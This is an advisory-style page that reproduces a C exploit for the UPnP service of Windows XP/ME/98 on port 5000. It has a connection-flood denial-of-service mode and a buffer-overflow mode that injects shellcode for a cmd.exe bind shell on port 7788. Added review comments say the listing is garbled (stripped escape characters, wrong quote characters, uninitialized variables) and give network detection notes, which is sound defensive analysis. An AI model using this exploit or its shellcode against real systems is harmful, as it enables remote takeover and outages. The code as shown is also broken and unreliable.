UPNP Exploit Code Released

Summary

As we reported in our previous article, UPNP – Multiple Remote Windows XP/ME/98 Vulnerabilities, a security vulnerability in the universal plug-and-play feature of Windows allows attackers to execute arbitrary commands remotely. The following is exploit code that can be used to test for this vulnerability.

Credit:

The information has been provided by Gabriel Maggiotti.


Details

Exploit:
/*
 * WinME/XP UPNP dos & overflow
 *
 * Run: ./XPloit host <option>
 *
 * Windows runs the 'Universal Plug and Play technology' service
 * at port 5000. In the future this will allow for seamless
 * connectivity of various devices such as a printer.
 * This service has a DoS and a buffer overflow that I exploit here.
 *
 * PS: the -e option spawns a cmd.exe shell on port 7788 (shellcode coded by isno)
 *
 * Author: Gabriel Maggiotti
 * Email: gmaggiot@ciudad.com.ar
 * Webpage: http://qb0x.net
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define MAX 10000      // capacity of the sockfd[] array in main(); only the first num_socks entries are used
#define PORT 5000      // target TCP port (the UPnP service named in the header comment)
#define FREEZE 512     // number of connections opened by the -f option
#define NOP 0x43 //inc ebx, used as filler instead of the usual 0x90 nop

/***************************************************************************/

/*
 * Entry point. argv[1] is the target host, argv[2] selects the mode:
 *   -f  open FREEZE (512) TCP connections to PORT and send "XP" on each
 *       (the DoS described in the header comment);
 *   -e  open a single connection and send request, which is assembled
 *       from jmpcode + execode + a CRLF CRLF terminator.
 *
 * NOTE(review): the listing as published is not compilable. The backslash
 * of every escape sequence has been stripped ("x90xeb...", "rnrn", "n" in
 * the usage text) and the string delimiters are typographic quotes. Treat
 * it as a historical record of the payload shape, not as working code.
 *
 * NOTE(review): num_socks, send_buffer and bindport are never initialized.
 * If argv[2] matches neither "-f" nor "-e", the socket loops below read
 * indeterminate values (undefined behavior); bindport is also read before
 * any assignment inside the -e branch.
 *
 * Detection notes: both modes target TCP/5000. The -f mode is a burst of
 * 512 near-simultaneous connections from one source, each carrying a
 * 2-byte payload; the -e mode is one request that begins with a 268-byte
 * run of the filler byte 0x43 and ends in what was evidently meant to be
 * "\r\n\r\n" (garbled to "rnrn" here).
 */
int main(int argc,char *argv[])
{
/* one descriptor per connection; only the first num_socks entries are used */
int sockfd[MAX];
/* 2-byte payload sent on every connection in -f mode */
char sendXP[]=’XP’;
/* jmpcode/execode are assembled as NUL-terminated strings so they can be
 * joined with strcat/snprintf; their sizes are tuned to the byte counts of
 * the hand-built payload below and must be kept in step with it */
char jmpcode[281], execode[840],request[2048];
char *send_buffer;
int num_socks;
int bindport;
int i;
int port;        /* unused */

 /* Payload from isno (see header). Position-sensitive: indices 778 and 779
  * are overwritten at run time in the -e branch, so any edit to this array
  * invalidates those offsets. It is passed to strcat() as unsigned char*,
  * which is a pointer-sign mismatch against the char* parameter. */
 unsigned char shellcode[] =
        ‘x90xebx03x5dxebx05xe8xf8xffxffxffx83xc5x15x90x90’
        ‘x90x8bxc5x33xc9x66xb9x10x03x50x80x30x97x40xe2xfa’
        ‘x7ex8ex95x97x97xcdx1cx4dx14x7cx90xfdx68xc4xf3x36’
        ‘x97x97x97x97xc7xf3x1exb2x97x97x97x97xa4x4cx2cx97’
        ‘x97x77xe0x7fx4bx96x97x97x16x6cx97x97x68x28x98x14’
        ‘x59x96x97x97x16x54x97x97x96x97xf1x16xacxdaxcdxe2’
        ‘x70xa4x57x1cxd4xabx94x54xf1x16xafxc7xd2xe2x4ex14’
        ‘x57xefx1cxa7x94x64x1cxd9x9bx94x5cx16xaexdcxd2xc5’
        ‘xd9xe2x52x16xeex93xd2xdbxa4xa5xe2x2bxa4x68x1cxd1’
        ‘xb7x94x54x1cx5cx94x9fx16xaexd0xf2xe3xc7xe2x9ex16’
        ‘xeex93xe5xf8xf4xd6xe3x91xd0x14x57x93x7cx72x94x68’
        ‘x94x6cx1cxc1xb3x94x6dxa4x45xf1x1cx80x1cx6dx1cxd1’
        ‘x87xdfx94x6fxa4x5ex1cx58x94x5ex94x5ex94xd9x8bx94’
        ‘x5cx1cxaex94x6cx7exfex96x97x97xc9x10x60x1cx40xa4’
        ‘x57x60x47x1cx5fx65x38x1exa5x1axd5x9fxc5xc7xc4x68’
        ‘x85xcdx1exd5x93x1axe5x82xc5xc1x68xc5x93xcdxa4x57’
        ‘x3bx13x57xe2x6exa4x5ex1dx99x13x5exe3x9exc5xc1xc4’
        ‘x68x85xcdx3cx75x7fxd1xc5xc1x68xc5x93xcdx1cx4fxa4’
  ‘x57x3bx13x57xe2x6exa4x5ex1dx99x17x6ex95xe3x9exc5’
        ‘xc1xc4x68x85xcdx3cx75x70xa4x57xc7xd7xc7xd7xc7x68’
        ‘xc0x7fx04xfdx87xc1xc4x68xc0x7bxfdx95xc4x68xc0x67’
        ‘xa4x57xc0xc7x27x9bx3cxcfx3cxd7x3cxc8xdfxc7xc0xc1’
        ‘x3axc1x68xc0x57xdfxc7xc0x3axc1x3axc1x68xc0x57xdf’
        ‘x27xd3x1ex90xc0x68xc0x53xa4x57x1cxd1x63x1exd0xab’
        ‘x1exd0xd7x1cx91x1exd0xafxa4x57xf1x2fx96x96x1exd0’
        ‘xbbxc0xc0xa4x57xc7xc7xc7xd7xc7xdfxc7xc7x3axc1xa4’
        ‘x57xc7x68xc0x5fx68xe1x67x68xc0x5bx68xe1x6bx68xc0’
        ‘x5bxdfxc7xc7xc4x68xc0x63x1cx4fxa4x57x23x93xc7x56’
        ‘x7fx93xc7x68xc0x43x1cx67xa4x57x1cx5fx22x93xc7xc7’
        ‘xc0xc6xc1x68xe0x3fx68xc0x47x14xa8x96xebxb5xa4x57’
        ‘xc7xc0x68xa0xc1x68xe0x3fx68xc0x4bx9cx57xe3xb8xa4’
        ‘x57xc7x68xa0xc1xc4x68xc0x6fxfdxc7x68xc0x77x7cx5f’
        ‘xa4x57xc7x23x93xc7xc1xc4x68xc0x6bxc0xa4x5exc6xc7’
        ‘xc1x68xe0x3bx68xc0x4fxfdxc7x68xc0x77x7cx3dxc7x68’
        ‘xc0x73x7cx69xcfxc7x1exd5x65x54x1cxd3xb3x9bx92x2f’
        ‘x97x97x97x50x97xefxc1xa3x85xa4x57x54x7cx7bx7fx75’
        ‘x6ax68x68x7fx05x69x68x68xdcxc1x70xe0xb4x17x70xe0’
        ‘xdbxf8xf6xf3xdbxfexf5xe5xf6xe5xeexd6x97xdcxd2xc5’
        ‘xd9xd2xdbxa4xa5x97xd4xe5xf2xf6xe3xf2xc7xfexe7xf2’
        ‘x97xd0xf2xe3xc4xe3xf6xe5xe3xe2xe7xdexf9xf1xf8xd6’
  ‘x97xd4xe5xf2xf6xe3xf2xc7xe5xf8xf4xf2xe4xe4xd6x97’
        ‘xd4xfbxf8xe4xf2xdfxf6xf9xf3xfbxf2x97xc7xf2xf2xfc’
        ‘xd9xf6xfaxf2xf3xc7xfexe7xf2x97xd0xfbxf8xf5xf6xfb’
        ‘xd6xfbxfbxf8xf4x97xc0xe5xfexe3xf2xd1xfexfbxf2x97’
        ‘xc5xf2xf6xf3xd1xfexfbxf2x97xc4xfbxf2xf2xe7x97xd2’
        ‘xefxfexe3xc7xe5xf8xf4xf2xe4xe4x97x97xc0xc4xd8xd4’
        ‘xdcxa4xa5x97xe4xf8xf4xfcxf2xe3x97xf5xfexf9xf3x97’
        ‘xfbxfexe4xe3xf2xf9x97xf6xf4xf4xf2xe7xe3x97xe4xf2’
        ‘xf9xf3x97xe5xf2xf4xe1x97x95x97x89xfbx97x97x97x97’
        ‘x97x97x97x97x97x97x97x97xf4xfaxf3xb9xf2xefxf2x97’
        ‘x68x68x68x68′;
struct hostent *he;
struct sockaddr_in their_addr;

  /* exactly two arguments: host and mode switch */
  if(argc!=3)
  {
    fprintf(stderr,’usage:%s <hostname> <command>n’,argv[0]);
    fprintf(stderr,’-f freeze the machine.n’);
    fprintf(stderr,’-e exploit.n’);
    exit(1);
  }

  /* strstr() matches the switch anywhere inside argv[2], so an argument
   * containing both "-f" and "-e" satisfies both branches; the -e branch
   * runs second and overrides num_socks and send_buffer. */
  if(strstr(argv[2],’-f’)) {
    num_socks=FREEZE;
    send_buffer=sendXP;
  }

  if(strstr(argv[2],’-e’)) {
    num_socks=1;
    send_buffer=request;
    /* bindport was never assigned: this reads an indeterminate value (UB) */
    bindport^=0x9797;
    /* write the two bytes of bindport into the payload, low byte first */
    shellcode[778]= (bindport) & 0xff;
    shellcode[779]= (bindport >> 8) & 0xff;

    /* 268 bytes of filler followed by the hand-placed bytes below */
    for(i = 0; i < 268; i++)
            jmpcode[i] = (char)NOP;

    jmpcode[268] = (char)0x4d;
    jmpcode[269] = (char)0x3f;
    jmpcode[270] = (char)0xe3;
    jmpcode[271] = (char)0x77;
    jmpcode[272] = (char)0x90;
    jmpcode[273] = (char)0x90;
    jmpcode[274] = (char)0x90;
    jmpcode[275] = (char)0x90;

    //jmp [ebx+0x64], jump to execute shellcode
    jmpcode[276] = (char)0xff;
    jmpcode[277] = (char)0x63;
    jmpcode[278] = (char)0x64;
    jmpcode[279] = (char)0x90;
    /* NUL terminator so jmpcode can be formatted with %s */
    jmpcode[280] = (char)0x00;

    /* 32 filler bytes, NUL-terminated, then the payload appended with strcat().
     * strcat() is unbounded and, like the strlen() in the send loop, stops at
     * the first 0x00 byte, so this assembly only works for a NUL-free payload
     * whose length fits in execode[]. */
    for(i = 0; i < 32; i++)
         execode[i] = (char)NOP;
    execode[32]=(char)0x00;
    strcat(execode, shellcode);

         /* the only bounded write: truncates at sizeof request */
         snprintf(request, 2048, ‘%s%srnrn’, jmpcode, execode);
  }

  /* gethostbyname() is obsolete (getaddrinfo() replaces it) and reports
   * failures through h_errno, not errno, so perror() prints an unrelated
   * message here; herror() is the matching call. */
  if((he=gethostbyname(argv[1]))==NULL)
  {
    perror(‘gethostbyname’);
    exit(1);
  }

/***************************************************************************/

  /* create all sockets first, then connect them, then send: the three
   * loops below all run to num_socks */
  for(i=0; i<num_socks;i++)
    if( (sockfd[i]=socket(AF_INET,SOCK_STREAM,0)) == -1) {
      perror(‘socket’); exit(1);
    }

  their_addr.sin_family=AF_INET;
  their_addr.sin_port=htons(PORT);
  their_addr.sin_addr=*((struct in_addr*)he->h_addr);
  /* bzero() is legacy; memset() is the portable equivalent */
  bzero(&(their_addr.sin_zero),8);

  /* sizeof(struct sockaddr) happens to equal sizeof their_addr for AF_INET;
   * sizeof their_addr would be the idiomatic form */
  for(i=0; i<num_socks;i++)
    if( connect(sockfd[i],(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1)
  {
    perror(‘connect’);
    exit(1);
  }

  
  /* strlen() bounds the send, so an embedded 0x00 would truncate the payload */
  for(i=0; i<num_socks;i++)
  if(send(sockfd[i],send_buffer,strlen(send_buffer),0) ==-1)
  {
    perror(‘send’);
    /* exit(0) signals success on a failure path; every other error exits 1 */
    exit(0);
  }

  for(i=0; i<num_socks;i++)
  close(sockfd[i]);

return 0;
}’
